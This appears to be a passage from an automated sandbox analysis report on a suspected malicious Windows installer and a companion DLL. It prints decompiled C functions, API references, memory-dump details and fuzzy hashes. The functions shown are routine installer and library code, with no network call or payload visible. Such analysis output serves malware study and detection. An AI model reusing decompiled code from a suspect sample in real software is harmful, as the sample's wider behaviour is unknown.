                0x00405e7c
                0x00405e80
                0x00000000
                0x00000000
                0x00405e86
                0x00405e8b
                0x00000000
                0x00000000
                0x00000000
                0x00405e8b
                0x00405e90

                APIs
                • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\Desktop\RHK098760045678009000.exe 0,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004030D6,C:\Users\user~1\AppData\Local\Temp\,?,00403289), ref: 00405E52
                • CharNextA.USER32(?,?,?,00000000), ref: 00405E5F
                • CharNextA.USER32(?,C:\Users\user\Desktop\RHK098760045678009000.exe 0,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004030D6,C:\Users\user~1\AppData\Local\Temp\,?,00403289), ref: 00405E64
                • CharPrevA.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,004030D6,C:\Users\user~1\AppData\Local\Temp\,?,00403289), ref: 00405E74
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Char$Next$Prev
                • String ID: *?|<>/":$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop\RHK098760045678009000.exe 0
                • API String ID: 589700163-3084571749
                • Opcode ID: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                • Instruction ID: 8fb4f4a5a46673644b6d17db89182f96b33943a1441b7055d0135b6347a17e40
                • Opcode Fuzzy Hash: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                • Instruction Fuzzy Hash: 0411B971804A9029EB321734DC44B7B7F88CB9A7A0F18447BD9D4722C2D67C5E429BED
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF81290, Relevance: 12.1, APIs: 5, Strings: 3, Instructions: 117COMMON
                Download Yara Rule
                C-Code - Quality: 65%
                			E6FF81290(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _t53;
				intOrPtr* _t56;
				intOrPtr _t67;
				signed int _t96;
				void* _t100;
				void* _t102;
				void* _t103;

				_v16 = _a4;
				_t53 = _a8;
				0x6ff80000(_t53, _a12, _a16);
				0x6ff80000("%p %s %lx %p\n", _a4, _t53);
				_t102 = _t100 + 0x18;
				if(_a8 == 0 || _a16 == 0) {
					return 0xc0000bbd;
				} else {
					EnterCriticalSection(0x6ff850ac);
					if(_v16 == 0 ||  *_v16 != 0x50444830) {
						LeaveCriticalSection(0x6ff850ac);
						return 0xc0000bbc;
					} else {
						_t56 = _a16;
						 *_t56 = 0;
						_v8 = 0;
						while(1) {
							0x6ff80000(0x6ff84170);
							_t103 = _t102 + 4;
							if(_v8 >= _t56) {
								break;
							}
							_t18 = (_v8 << 5) + 0x6ff84174; // 0x6ff86658
							_t74 =  *_t18;
							_t56 = E6FF82D50( *_t18, _a8);
							_t102 = _t103 + 8;
							if(_t56 == 0) {
								_v8 = _v8 + 1;
								continue;
							}
							_v12 = E6FF82BE0(_t56, _t74);
							if(_v12 == 0) {
								LeaveCriticalSection(0x6ff850ac);
								return 0xc0000bbb;
							}
							_t22 = (_v8 << 5) + 0x6ff84174; // 0x6ff86658
							 *((intOrPtr*)(_v12 + 4)) = E6FF82B30(_t74,  *_t22);
							_t27 = (_v8 << 5) + 0x6ff84178; // 0x6ff82c90
							 *((intOrPtr*)(_v12 + 0x30)) =  *_t27;
							_t31 = (_v8 << 5) + 0x6ff8417c; // 0x21510500
							 *((intOrPtr*)(_v12 + 8)) =  *_t31;
							_t35 = (_v8 << 5) + 0x6ff84180; // 0xfffffffb
							 *((intOrPtr*)(_v12 + 0x14)) =  *_t35;
							_t96 = _v8 << 5;
							_t67 = _v12;
							_t39 = _t96 + 0x6ff84188; // 0x989680
							 *((intOrPtr*)(_t67 + 0x20)) =  *_t39;
							_t41 = _t96 + 0x6ff8418c; // 0x0
							 *((intOrPtr*)(_t67 + 0x24)) =  *_t41;
							 *((intOrPtr*)(_v12 + 0x1c)) =  *((intOrPtr*)(_v16 + 4));
							 *((intOrPtr*)(_v12 + 0x18)) = _a12;
							 *_a16 = _v12;
							LeaveCriticalSection(0x6ff850ac);
							return 0;
						}
						LeaveCriticalSection(0x6ff850ac);
						return 0xc0000bb9;
					}
				}
			}













                0x6ff81299
                0x6ff812a4
                0x6ff812a8
                0x6ff812ba
                0x6ff812bf
                0x6ff812c6
                0x00000000
                0x6ff812d8
                0x6ff812dd
                0x6ff812e7
                0x6ff812f9
                0x00000000
                0x6ff81309
                0x6ff81309
                0x6ff8130c
                0x6ff81312
                0x6ff81324
                0x6ff81329
                0x6ff8132e
                0x6ff81334
                0x00000000
                0x00000000
                0x6ff81344
                0x6ff81344
                0x6ff8134b
                0x6ff81350
                0x6ff81355
                0x6ff81321
                0x00000000
                0x6ff81321
                0x6ff81360
                0x6ff81367
                0x6ff8140a
                0x00000000
                0x6ff81410
                0x6ff81373
                0x6ff81385
                0x6ff81391
                0x6ff81397
                0x6ff813a3
                0x6ff813a9
                0x6ff813b5
                0x6ff813bb
                0x6ff813c1
                0x6ff813c4
                0x6ff813c7
                0x6ff813cd
                0x6ff813d0
                0x6ff813d6
                0x6ff813e2
                0x6ff813eb
                0x6ff813f4
                0x6ff813fb
                0x00000000
                0x6ff81401
                0x6ff81421
                0x00000000
                0x6ff81427
                0x6ff812e7

                APIs
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF812DD
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF812F9
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF81421
                  • Part of subcall function 6FF82D50: wcschr.MSVCRT ref: 6FF82D87
                  • Part of subcall function 6FF82D50: wcschr.MSVCRT ref: 6FF82DCF
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF813FB
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF8140A
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.292808279.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000008.00000002.292794605.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292828297.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292861128.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000008.00000002.292906890.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$Leave$wcschr$Enter
                • String ID: %p %s %lx %p$0HDP$p-w
                • API String ID: 263007561-2707375437
                • Opcode ID: 030f71b02618c64b2b61af81ae5091bbe9d286762e2bef2dabd3cbac3f1bfbcc
                • Instruction ID: 1b9114f14fb820f9e7049a2ebd201caa4257898eb0dfbd7a5600abb1af13918d
                • Opcode Fuzzy Hash: 030f71b02618c64b2b61af81ae5091bbe9d286762e2bef2dabd3cbac3f1bfbcc
                • Instruction Fuzzy Hash: 76417AB4A00608EFDB04DF98D580A9EBBB5FF4A314F118299E8359B355D731EA80CF91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403EBB, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00403EBB(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                0x00403ecd
                0x00403f61
                0x00000000
                0x00403f61
                0x00403ede
                0x00403ee2
                0x00000000
                0x00000000
                0x00403ee8
                0x00403ef1
                0x00403ef4
                0x00403ef4
                0x00403efa
                0x00403f00
                0x00403f00
                0x00403f0c
                0x00403f12
                0x00403f19
                0x00403f1c
                0x00403f1f
                0x00403f21
                0x00403f21
                0x00403f29
                0x00403f2f
                0x00403f2f
                0x00403f39
                0x00403f3e
                0x00403f41
                0x00403f46
                0x00403f49
                0x00403f49
                0x00403f59
                0x00403f59
                0x00000000

                APIs
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                • String ID:
                • API String ID: 2320649405-0
                • Opcode ID: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                • Instruction ID: 51638b03811fbd3f25a4eb1d810876b9f584da0c3187da66c7daa715c1b02470
                • Opcode Fuzzy Hash: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                • Instruction Fuzzy Hash: 08218471904745ABCB219F78DD08B4BBFF8AF05715B048629F856E22E0D734E904CB55
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004026AF, Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                Download Yara Rule
                C-Code - Quality: 86%
                			E004026AF(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *((intOrPtr*)(_t58 - 0xc)) = 0xfffffd66;
				_t52 = E00402A29(0xfffffff0);
				 *(_t58 - 0x38) = _t24;
				if(E004056F8(_t52) == 0) {
					E00402A29(0xffffffed);
				}
				E00405850(_t52);
				_t27 = E0040586F(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423f54; // 0x2b400
					 *(_t58 - 0x30) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004030B3(_t47);
						E00403081(_t51,  *(_t58 - 0x30));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x20));
						 *(_t58 - 0x34) = _t56;
						if(_t56 != _t47) {
							E00402E8E( *((intOrPtr*)(_t58 - 0x24)), _t47, _t56,  *(_t58 - 0x20));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x48) =  *_t56;
								E00405830( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x48);
							}
							GlobalFree( *(_t58 - 0x34));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 0x3c, _t47);
						GlobalFree(_t51);
						 *((intOrPtr*)(_t58 - 0xc)) = E00402E8E(0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *((intOrPtr*)(_t58 - 0xc)) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x38));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                0x004026af
                0x004026b1
                0x004026bd
                0x004026c0
                0x004026ca
                0x004026ce
                0x004026ce
                0x004026d4
                0x004026e1
                0x004026e9
                0x004026ec
                0x004026f2
                0x00402700
                0x00402705
                0x00402709
                0x0040270c
                0x00402715
                0x00402721
                0x00402725
                0x00402728
                0x00402732
                0x00402751
                0x00402739
                0x0040273e
                0x00402746
                0x00402749
                0x0040274e
                0x0040274e
                0x00402758
                0x00402758
                0x0040276a
                0x00402771
                0x00402783
                0x00402783
                0x00402789
                0x00402789
                0x00402794
                0x00402795
                0x00402799
                0x0040279d
                0x004027a3
                0x004027a3
                0x004027aa
                0x00402197
                0x004028c1
                0x004028cd

                APIs
                • GlobalAlloc.KERNEL32(00000040,0002B400,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402703
                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040271F
                • GlobalFree.KERNEL32 ref: 00402758
                • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,000000F0), ref: 0040276A
                • GlobalFree.KERNEL32 ref: 00402771
                • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402789
                • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                • String ID:
                • API String ID: 3294113728-0
                • Opcode ID: 86c275f08be09aec70893b32aeacbca8804cc45ae7d70b5d5ba6e64a6a3d4a6c
                • Instruction ID: c2c7835655fcdbd4aa1197060f7bd229eae72b48ff88aadc8082708ad166979d
                • Opcode Fuzzy Hash: 86c275f08be09aec70893b32aeacbca8804cc45ae7d70b5d5ba6e64a6a3d4a6c
                • Instruction Fuzzy Hash: 9A31AD71C00128BBCF216FA5DE88DAEBA79EF04364F14423AF924762E0C67949418B99
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404E84, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00404E84(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423724; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x423ff4; // 0x0
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405BBA(0, _t39, 0x41fd10, 0x41fd10, _a4);
					}
					_t26 = lstrlenA(0x41fd10);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423708, 0x41fd10);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fd10;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fd10)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fd10, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                0x00404e8a
                0x00404e96
                0x00404e99
                0x00404e9f
                0x00404eab
                0x00404eae
                0x00404eb1
                0x00404eb7
                0x00404eb7
                0x00404ebd
                0x00404ec5
                0x00404ec8
                0x00404ee5
                0x00404ee9
                0x00404ef2
                0x00404ef2
                0x00404efc
                0x00404f05
                0x00404f11
                0x00404f18
                0x00404f1c
                0x00404f1f
                0x00404f32
                0x00404f40
                0x00404f40
                0x00404f44
                0x00404f46
                0x00404f49
                0x00000000
                0x00404f49
                0x00404eca
                0x00404ed2
                0x00404eda
                0x00404ee0
                0x00000000
                0x00404ee0
                0x00404eda
                0x00404ec8
                0x00404f53

                APIs
                • lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                • lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                • lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                • SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                • SendMessageA.USER32 ref: 00404F18
                • SendMessageA.USER32 ref: 00404F32
                • SendMessageA.USER32 ref: 00404F40
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                • String ID:
                • API String ID: 2531174081-0
                • Opcode ID: 71e37258a37026cf273fcfa99aead3f8e91a2c4ccac8b3bb5b1c98b8a192fec2
                • Instruction ID: 29716f0e6f05b21b32fe67f81276caf5577c11483a64657c7043e00463a136c9
                • Opcode Fuzzy Hash: 71e37258a37026cf273fcfa99aead3f8e91a2c4ccac8b3bb5b1c98b8a192fec2
                • Instruction Fuzzy Hash: 21218EB1900118BBDF119FA5DC849DFBFB9FB44354F10807AF904A6290C7789E418BA8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF818C0, Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 69COMMON
                Download Yara Rule
                C-Code - Quality: 56%
                			E6FF818C0(intOrPtr* _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr* _v8;
				intOrPtr _v12;

				_v8 = _a4;
				0x6ff80000("%p %x %p %p\n", _a4, _a8, _a12, _a16);
				if(_a16 != 0) {
					EnterCriticalSection(0x6ff850ac);
					if(_v8 == 0 ||  *_v8 != 0x50444831) {
						LeaveCriticalSection(0x6ff850ac);
						return 0xc0000bbc;
					} else {
						if( *((intOrPtr*)(_v8 + 0xc)) == 0) {
							_push(_a16);
							_push(_v8 + 0x40);
							_push(_v8 + 0x38);
							_push(_a8);
							_v12 = E6FF82E80(_v8);
							if(_v12 == 0) {
								 *_a16 = 0;
								if(_a12 != 0) {
									 *_a12 =  *((intOrPtr*)(_v8 + 8));
								}
							}
							LeaveCriticalSection(0x6ff850ac);
							return _v12;
						}
						LeaveCriticalSection(0x6ff850ac);
						return 0xc0000bc6;
					}
				}
				return 0xc0000bbd;
			}





                0x6ff818c9
                0x6ff818e1
                0x6ff818ed
                0x6ff818fe
                0x6ff81908
                0x6ff8191a
                0x00000000
                0x6ff81927
                0x6ff8192e
                0x6ff81945
                0x6ff8194c
                0x6ff81953
                0x6ff81957
                0x6ff81964
                0x6ff8196b
                0x6ff81970
                0x6ff8197a
                0x6ff81985
                0x6ff81985
                0x6ff8197a
                0x6ff8198c
                0x00000000
                0x6ff81992
                0x6ff81935
                0x00000000
                0x6ff8193b
                0x6ff81908
                0x00000000

                APIs
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF818FE
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF8191A
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.292808279.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000008.00000002.292794605.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292828297.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292861128.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000008.00000002.292906890.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$EnterLeave
                • String ID: %p %x %p %p$1HDP$p-w
                • API String ID: 3168844106-2712400308
                • Opcode ID: fdf1f510e15b4183584d26adb2e3007729692b69529440385da030728344b43a
                • Instruction ID: e08a3a759cfa96f015ff430fdf49c5bb0397abd7e6ad8b64fc818e5805665c9e
                • Opcode Fuzzy Hash: fdf1f510e15b4183584d26adb2e3007729692b69529440385da030728344b43a
                • Instruction Fuzzy Hash: 59213AB5601249EFDB00CF98D944BAE7BB5BF4A319F108249F8269B340D774AE50CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 6FF81570, Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 65COMMON
                Download Yara Rule
                C-Code - Quality: 58%
                			E6FF81570(intOrPtr* _a4, signed int* _a8) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _t18;
				intOrPtr _t19;
				signed int _t21;
				signed int* _t31;

				_v8 = _a4;
				0x6ff80000("%p %p\n", _a4, _a8);
				if(_a8 != 0) {
					EnterCriticalSection(0x6ff850ac);
					if(_v8 == 0) {
						L4:
						LeaveCriticalSection(0x6ff850ac);
						return 0xc0000bbc;
					}
					_t18 = _v8;
					if( *_t18 == 0x50444830) {
						0x6ff80000(1);
						if(_t18 == 0) {
							_t19 = E6FF82EB0(_t18);
							0x6ff80000(2, _v8);
							_v16 = _t19;
							_t21 = E6FF81000( *((intOrPtr*)(_v12 + 0x2c)), 0x20, 0);
							_t31 = _a8;
							 *_t31 = _t21 |  *(_v12 + 0x28);
							_t31[1] = 0;
							LeaveCriticalSection(0x6ff850ac);
							return 0;
						}
						LeaveCriticalSection(0x6ff850ac);
						return 0x800007d5;
					}
					goto L4;
				}
				return 0xc0000bbd;
			}










                0x6ff8157a
                0x6ff8158a
                0x6ff81596
                0x6ff815a7
                0x6ff815b1
                0x6ff815be
                0x6ff815c3
                0x00000000
                0x6ff815c9
                0x6ff815b3
                0x6ff815bc
                0x6ff815d2
                0x6ff815dc
                0x6ff815f4
                0x6ff815fe
                0x6ff81606
                0x6ff81615
                0x6ff81624
                0x6ff81627
                0x6ff81629
                0x6ff81631
                0x00000000
                0x6ff81637
                0x6ff815e3
                0x00000000
                0x6ff815e9
                0x00000000
                0x6ff815bc
                0x00000000

                APIs
                • EnterCriticalSection.KERNEL32(6FF850AC), ref: 6FF815A7
                • LeaveCriticalSection.KERNEL32(6FF850AC), ref: 6FF815C3
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.292808279.000000006FF81000.00000020.00020000.sdmp, Offset: 6FF80000, based on PE: true
                • Associated: 00000008.00000002.292794605.000000006FF80000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292828297.000000006FF84000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.292861128.000000006FF85000.00000040.00020000.sdmp Download File
                • Associated: 00000008.00000002.292906890.000000006FF87000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalSection$EnterLeave
                • String ID: %p %p$0HDP$p-w
                • API String ID: 3168844106-1388213855
                • Opcode ID: 385e9128b9c0d01ad50738c4d29d6e46be301be91b5c894471ccb04886c564e9
                • Instruction ID: 358ee884f5ff10d428371a1b62bba1d30437c1ab4e604d63c16654b23032d712
                • Opcode Fuzzy Hash: 385e9128b9c0d01ad50738c4d29d6e46be301be91b5c894471ccb04886c564e9
                • Instruction Fuzzy Hash: 2021A2B5A11108EFDB00DFA8D501B9E7BB4BF49314F148259F83ADB344EB71AA40CB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404753, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00404753(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                0x00404761
                0x0040476e
                0x00404774
                0x004047b2
                0x004047b2
                0x004047c1
                0x004047c8
                0x00000000
                0x004047ca
                0x00404776
                0x00404785
                0x0040478d
                0x00404790
                0x004047a2
                0x004047a8
                0x004047af
                0x00000000
                0x004047af
                0x00000000

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Message$Send$ClientScreen
                • String ID: f
                • API String ID: 41195575-1993550816
                • Opcode ID: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                • Instruction ID: b5292072505f589c3e6e61736795eac3e8b5c463abbfbac9e5f2f3c06e421abf
                • Opcode Fuzzy Hash: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                • Instruction Fuzzy Hash: BE015275D00219BADB00DB94DC45BFEBBBCAB55715F10412BBB10B71C1C7B465418BA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402B6E, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00402B6E(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x40b0d8; // 0x2b400
					_t11 =  *0x41f0e8;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                0x00402b7b
                0x00402b89
                0x00402b8f
                0x00402b8f
                0x00402b9d
                0x00402b9f
                0x00402ba5
                0x00402bac
                0x00402bae
                0x00402bae
                0x00402bc4
